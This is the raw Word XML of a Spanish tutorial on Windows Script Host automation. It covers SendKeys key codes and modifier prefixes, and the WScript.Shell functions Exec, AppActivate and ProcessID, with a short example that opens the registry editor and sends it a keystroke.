              <w:right w:val="double" w:sz="2" w:space="0" w:color="80808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INS o INSERTAR</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5"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INSERT} o {INS}</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nil"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="808080"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="6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FLECHA IZQUIERDA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3981"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9"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LEFT}</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BLOQ NUM</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NUMLOCK}</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AV PÁG</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PGDN}</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single" w:sz="2" w:space="0" w:color="808080"/>
              <w:right w:val="double" w:sz="2" w:space="0" w:color="80808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RE PÁG</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PGUP}</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nil"/>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IMPRIMIR PANTALLA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3981"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PRTSC}</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LECHA DERECHA</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RIGHT}</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BLOQ DESPL</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SCROLLLOCK}</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AB</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AB}</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LECHA ARRIBA</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UP}</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2</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2}</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3</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3}</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4</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4}</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5</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5}</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6</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6}</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single" w:sz="2" w:space="0" w:color="80808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7</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7}</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78"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6554" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="2" w:space="0" w:color="808080"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="00000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0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="double" w:sz="2" w:space="0" w:color="80808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78"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6554" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="808080"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="808080"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="808080"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="80808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76" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="double" w:sz="2" w:space="0" w:color="80808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02"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="76" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="808080"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="80808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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3981"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8}</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9</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9}</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0</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0}</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19"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1</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1}</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2</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2}</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3</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3}</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4</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4}</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5</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5}</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single" w:sz="2" w:space="0" w:color="80808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6</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6}</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78"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6554" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="2" w:space="0" w:color="808080"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="00000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0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="double" w:sz="2" w:space="0" w:color="80808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Por ultimo decir sobre esta función que para enviar aquellos caracteres del teclado formados por la pulsación de una tecla normal combinada con Mayús, Ctrl o Alt debe colocar delante el caracter al que influyen uno de estos signos dependiendo de la siguiente tabla:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="3170" w:type="dxa"/>
        <w:tblInd w:w="2741" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="26" w:type="dxa"/>
          <w:left w:w="39" w:type="dxa"/>
          <w:right w:w="37" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1553"/>
        <w:gridCol w:w="1617"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="328"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1222" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="00000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b/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Tecla</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1948" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="48" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:bdr w:val="single" w:sz="2" w:space="0" w:color="000000"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Carácter especial</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="328"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1222" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="00000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Mayúsculas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1948" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="double" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:righ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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="328"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1222" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="sing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Ctrl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="328"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="122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Alt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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ejemplo, si queremos pulsar el Ctrl+Alt+Supr para abrir las tareas de Windows enviaremos "^(%{DEL})". Ten en cuenta que como puedes comprobar si unes dos teclas especiales tienes que </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>usar el paréntesis</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para encerrar a la segunda y a la tercera pulsación enviad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ero bueno, creo que me he extendido demasiado con esta función, pero es la base de controlar las aplicaciones. Pero aún hay más que aprender. Para realizar un buen control necesitaremos las funciones </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Sleep</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endKeys</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, y las funciones nuevas </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Exec</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AppActivate</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ProcessID</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Terminat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Status</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Ahora explicare el uso de cada una y por ultimo pondré un ejemplo para controlar una aplicación sencill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Empezare con la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Exec, que tiene una función similar a la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, pero esta guarda la estructura de la aplicación en marcha en una variable con la que luego operaremos para controlarla a voluntad. Se usa utilizando el objeto </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>WScript.Shell</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, de la siguiente forma (en este ejemplo abrimos el regedit, pero ten en cuenta que el directorio de instalación de Win </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>no siempre es el mismo</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> así que lo correcto sería usar </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>GetSpecialFolder</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, sacar el nombre y luego usarlo aquí):</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Applicaion = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ws.Exec</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>("C:\Windows\regedit.ex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en la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>primera línea</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> colocamos el objeto. En la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>segunda línea</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizando el objeto usamos la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Exec </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">(que lleva delante unido por un punto (.) la variable (ws) que guarda el objeto). Dentro de la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">función colocamos primero la ruta, que en este caso es el disco duro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seguido de \ y el nombre del archivo, un punto y su extensión. Esta función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ejecutará el archivo</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que le hayamos indicado. Todo esto esta unido a una variable mediante </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">VarApplicaion, esto guarda la estructura de la aplicación ejecutada en la variable para luego poder controlarla. El </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>efecto de esta función</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> es simple, se </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ejecutara</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> el Editor del Registro de Windows. </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s siguientes </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>dos funciones</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (AppActivate y ProcessID) se utilizan siempre juntas. Estas sirven para </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>darle el foco a la ventana que hemos abierto</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Dar el foco a una ventana significa solamente </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>activarla</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, es decir, tiene el mismo efecto que hacer clic sobre ella. Esto es muy importante porque si no lo hacemos </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>las pulsaciones</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> pueden irse a cualquier sitio y</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> no provocan el efecto</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> deseado. Por eso siempre se usará antes de la función SendKeys. Abajo un ejemplo de uso de dicha funció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Applicaion = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ws.Exec</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>("C:\Windows\regedit.exe") Wscript.Sleep 10000</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ws.AppActivate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> VarApplicaion.ProcessID ws.SendKeys "{UP}"</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pequeño código ejecuta el Registro, se espera diez segundos a que se abra (por si se utiliza un procesador lento), le concede el foco (por si se ha abierto en un procesador rápido y alguien cansado de esperar a abierto algo) y le envía una pulsación de la flecha arriba. En este Script </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">la cuarta línea es la que le concede el foco a la aplicación </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">abierta. Esto lo hace de la siguiente forma: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ws.AppActivate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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le da el foco a una ventana</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esto lo hace </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>especificando el nombre</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la ventana (como valor de cadena), </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>o el número del proceso</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (como valor numérico). VarApplicaion.ProcessID es una función que </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>devuelve el numero del proceso</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la aplicación abierta por VarApplicaion (solo lectura), y así, podemos </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>devolver el foco a la aplicación</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Otra forma de usar esta función es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>indicando el nombre de la ventana</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
